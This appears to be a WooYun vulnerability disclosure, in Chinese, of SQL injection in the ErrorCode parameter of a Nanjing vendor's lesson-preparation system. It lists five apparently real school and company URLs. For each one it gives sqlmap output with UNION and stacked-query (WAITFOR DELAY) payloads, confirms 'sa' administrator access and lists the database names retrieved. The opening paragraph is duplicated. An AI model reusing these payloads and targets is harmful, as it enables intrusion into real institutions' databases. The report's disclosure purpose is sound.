### 简要描述: 某通用型备课系统SQL注入 ### 详细说明: 厂商:南京苏亚星资讯科技开发有限公司 网络备课系统 ErrorCode参数没有过滤,导致注射。 这边需要说明是与这个案例参数相同,但是系统不同,当前数据库也是不同的。 [WooYun: 某通用型校园校务系统SQL注入](http://www.wooyun.org/bugs/wooyun-2014-082279) [<img src="https://images.seebug.org/upload/201411/2812311199931d463cae8282a313d4d3960642e3.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2812311199931d463cae8282a313d4d3960642e3.png) 5个案例证明通用性 http://www.scyahyez.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.sdwhys.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 1、sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: ErrorCode Type: UNION query Title:...
### 简要描述: 某通用型备课系统SQL注入 ### 详细说明: 厂商:南京苏亚星资讯科技开发有限公司 网络备课系统 ErrorCode参数没有过滤,导致注射。 这边需要说明是与这个案例参数相同,但是系统不同,当前数据库也是不同的。 [WooYun: 某通用型校园校务系统SQL注入](http://www.wooyun.org/bugs/wooyun-2014-082279) [<img src="https://images.seebug.org/upload/201411/2812311199931d463cae8282a313d4d3960642e3.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2812311199931d463cae8282a313d4d3960642e3.png) 5个案例证明通用性 http://www.scyahyez.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.sdwhys.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 1、sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-4501' UNION ALL SELECT CHAR(58)+CHAR(107)+CHAR(103)+CHAR (114)+CHAR(58)+CHAR(75)+CHAR(122)+CHAR(86)+CHAR(117)+CHAR(103)+CHAR(120)+CHAR(73 )+CHAR(99)+CHAR(112)+CHAR(77)+CHAR(58)+CHAR(110)+CHAR(103)+CHAR(108)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';-- --- [12:17:29] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [12:17:29] [INFO] fetching current user [12:17:33] [INFO] heuristics detected web page charset 'ascii' [12:17:34] [WARNING] reflective value(s) found and filtering out current user: 'sa' [12:17:34] [INFO] fetching current database current database: 'Merak' [12:17:38] [INFO] fetching database names [12:17:43] [INFO] the SQL query used returns 13 entries [12:17:48] [INFO] retrieved: "Jupiter5" [12:17:52] [INFO] retrieved: "master" [12:17:57] [INFO] retrieved: "Merak" [12:18:02] [INFO] retrieved: "model" [12:18:06] [INFO] retrieved: "msdb" [12:18:11] [INFO] retrieved: "ReportServer" [12:18:16] [INFO] retrieved: "ReportServerTempDB" [12:18:20] [INFO] retrieved: "SM2005" [12:18:25] [INFO] retrieved: "SRP2003" [12:18:30] [INFO] retrieved: "tempdb" [12:18:34] [INFO] retrieved: "vc2003" [12:18:39] [INFO] retrieved: "Vod2005" [12:18:44] [INFO] retrieved: "ws2004" available databases [13]: [*] Jupiter5 [*] master [*] Merak [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] SM2005 [*] SRP2003 [*] tempdb [*] vc2003 [*] Vod2005 [*] ws2004 [12:18:44] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [12:18:44] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.scyahyez.com' 2、sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-7150' UNION ALL SELECT CHAR(58)+CHAR(106)+CHAR(104)+CHAR (103)+CHAR(58)+CHAR(84)+CHAR(84)+CHAR(102)+CHAR(85)+CHAR(71)+CHAR(83)+CHAR(78)+C HAR(90)+CHAR(73)+CHAR(101)+CHAR(58)+CHAR(113)+CHAR(105)+CHAR(116)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';-- --- [12:17:33] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:17:33] [INFO] fetching current user [12:17:38] [INFO] heuristics detected web page charset 'ascii' [12:17:38] [WARNING] reflective value(s) found and filtering out current user: 'sa' [12:17:38] [INFO] fetching current database current database: 'Merak' [12:17:42] [INFO] fetching database names [12:17:47] [INFO] the SQL query used returns 23 entries [12:17:52] [INFO] retrieved: "Jupiter5" [12:17:56] [INFO] retrieved: "master" [12:18:01] [INFO] retrieved: "Merak" [12:18:05] [INFO] retrieved: "model" [12:18:10] [INFO] retrieved: "msdb" [12:18:14] [INFO] retrieved: "Northwind" [12:18:19] [INFO] retrieved: "pubs" [12:18:23] [INFO] retrieved: "Sco_CRM" [12:18:28] [INFO] retrieved: "Sco_CSM" [12:18:32] [INFO] retrieved: "Sco_Document" [12:18:37] [INFO] retrieved: "Sco_Financial" [12:18:42] [INFO] retrieved: "Sco_Inventory" [12:18:46] [INFO] retrieved: "Sco_Personnel" [12:18:51] [INFO] retrieved: "Sco_Platform" [12:18:55] [INFO] retrieved: "Sco_Portal" [12:19:00] [INFO] retrieved: "SM2005" [12:19:04] [INFO] retrieved: "SRP2003" [12:19:09] [INFO] retrieved: "tempdb" [12:19:13] [INFO] retrieved: "TempJupiterSa" [12:19:18] [INFO] retrieved: "test" [12:19:23] [INFO] retrieved: "vc2003" [12:19:27] [INFO] retrieved: "web" [12:19:32] [INFO] retrieved: "ws2004" available databases [23]: [*] Jupiter5 [*] master [*] Merak [*] model [*] msdb [*] Northwind [*] pubs [*] Sco_CRM [*] Sco_CSM [*] Sco_Document [*] Sco_Financial [*] Sco_Inventory [*] Sco_Personnel [*] Sco_Platform [*] Sco_Portal [*] SM2005 [*] SRP2003 [*] tempdb [*] TempJupiterSa [*] test [*] vc2003 [*] web [*] ws2004 [12:19:32] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [12:19:32] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com' 3、sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-3088' UNION ALL SELECT CHAR(58)+CHAR(122)+CHAR(104)+CHAR (98)+CHAR(58)+CHAR(113)+CHAR(72)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(65)+CHAR(114)+ CHAR(82)+CHAR(70)+CHAR(68)+CHAR(58)+CHAR(119)+CHAR(110)+CHAR(97)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';-- --- [12:17:24] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:17:24] [INFO] fetching current user [12:17:29] [INFO] heuristics detected web page charset 'ascii' [12:17:29] [WARNING] reflective value(s) found and filtering out current user: 'sa' [12:17:29] [INFO] fetching current database current database: 'Merak' [12:17:34] [INFO] fetching database names [12:17:38] [INFO] the SQL query used returns 14 entries [12:17:43] [INFO] retrieved: "aaa" [12:17:47] [INFO] retrieved: "Jupiter5" [12:17:52] [INFO] retrieved: "master" [12:17:57] [INFO] retrieved: "Merak" [12:18:01] [INFO] retrieved: "model" [12:18:06] [INFO] retrieved: "msdb" [12:18:10] [INFO] retrieved: "Northwind" [12:18:15] [INFO] retrieved: "pubs" [12:18:20] [INFO] retrieved: "SM2005" [12:18:24] [INFO] retrieved: "SRP2003" [12:18:29] [INFO] retrieved: "tempdb" [12:18:34] [INFO] retrieved: "vc2003" [12:18:38] [INFO] retrieved: "Vod2005" [12:18:43] [INFO] retrieved: "ws2004" available databases [14]: [*] aaa [*] Jupiter5 [*] master [*] Merak [*] model [*] msdb [*] Northwind [*] pubs [*] SM2005 [*] SRP2003 [*] tempdb [*] vc2003 [*] Vod2005 [*] ws2004 [12:18:43] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [12:18:43] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.sdwhys.com' 4、sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-6400' UNION ALL SELECT CHAR(58)+CHAR(107)+CHAR(120)+CHAR (113)+CHAR(58)+CHAR(110)+CHAR(77)+CHAR(122)+CHAR(65)+CHAR(75)+CHAR(100)+CHAR(82) +CHAR(122)+CHAR(80)+CHAR(70)+CHAR(58)+CHAR(116)+CHAR(100)+CHAR(119)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';-- --- [12:17:02] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2005 [12:17:02] [INFO] fetching current user [12:17:03] [INFO] heuristics detected web page charset 'ascii' [12:17:03] [WARNING] reflective value(s) found and filtering out current user: 'sa' [12:17:03] [INFO] fetching current database current database: 'Merak' [12:17:03] [INFO] fetching database names [12:17:03] [INFO] the SQL query used returns 13 entries [12:17:03] [INFO] retrieved: "Jupiter5" [12:17:03] [INFO] retrieved: "master" [12:17:04] [INFO] retrieved: "Merak" [12:17:04] [INFO] retrieved: "model" [12:17:04] [INFO] retrieved: "msdb" [12:17:04] [INFO] retrieved: "ReportServer" [12:17:04] [INFO] retrieved: "ReportServerTempDB" [12:17:05] [INFO] retrieved: "SM2005" [12:17:05] [INFO] retrieved: "SRP2003" [12:17:05] [INFO] retrieved: "tempdb" [12:17:05] [INFO] retrieved: "vc2003" [12:17:05] [INFO] retrieved: "Vod2005" [12:17:05] [INFO] retrieved: "ws2004" available databases [13]: [*] Jupiter5 [*] master [*] Merak [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] SM2005 [*] SRP2003 [*] tempdb [*] vc2003 [*] Vod2005 [*] ws2004 [12:17:06] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [12:17:06] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com' 5、sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-7264' UNION ALL SELECT CHAR(58)+CHAR(120)+CHAR(100)+CHAR (120)+CHAR(58)+CHAR(105)+CHAR(99)+CHAR(110)+CHAR(111)+CHAR(79)+CHAR(77)+CHAR(117 )+CHAR(102)+CHAR(112)+CHAR(74)+CHAR(58)+CHAR(116)+CHAR(102)+CHAR(97)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';-- --- [12:17:10] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:17:10] [INFO] fetching current user [12:17:14] [INFO] heuristics detected web page charset 'ascii' [12:17:14] [WARNING] reflective value(s) found and filtering out current user: 'sa' [12:17:14] [INFO] fetching current database current database: 'Merak' [12:17:19] [INFO] fetching database names [12:17:24] [INFO] the SQL query used returns 13 entries [12:17:29] [INFO] retrieved: "Jupiter5" [12:17:33] [INFO] retrieved: "master" [12:17:38] [INFO] retrieved: "Merak" [12:17:42] [INFO] retrieved: "model" [12:17:47] [INFO] retrieved: "msdb" [12:17:52] [INFO] retrieved: "Northwind" [12:17:56] [INFO] retrieved: "pubs" [12:18:01] [INFO] retrieved: "SM2005" [12:18:05] [INFO] retrieved: "SRP2003" [12:18:10] [INFO] retrieved: "tempdb" [12:18:15] [INFO] retrieved: "vc2003" [12:18:19] [INFO] retrieved: "Vod2005" [12:18:24] [INFO] retrieved: "ws2004" available databases [13]: [*] Jupiter5 [*] master [*] Merak [*] model [*] msdb [*] Northwind [*] pubs [*] SM2005 [*] SRP2003 [*] tempdb [*] vc2003 [*] Vod2005 [*] ws2004 [12:18:24] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [12:18:24] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com' 全为sa权限 [<img src="https://images.seebug.org/upload/201411/281233464c8156a7e8e6ca8c82d80752e9d64d27.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/281233464c8156a7e8e6ca8c82d80752e9d64d27.png) ### 漏洞证明: 已经证明
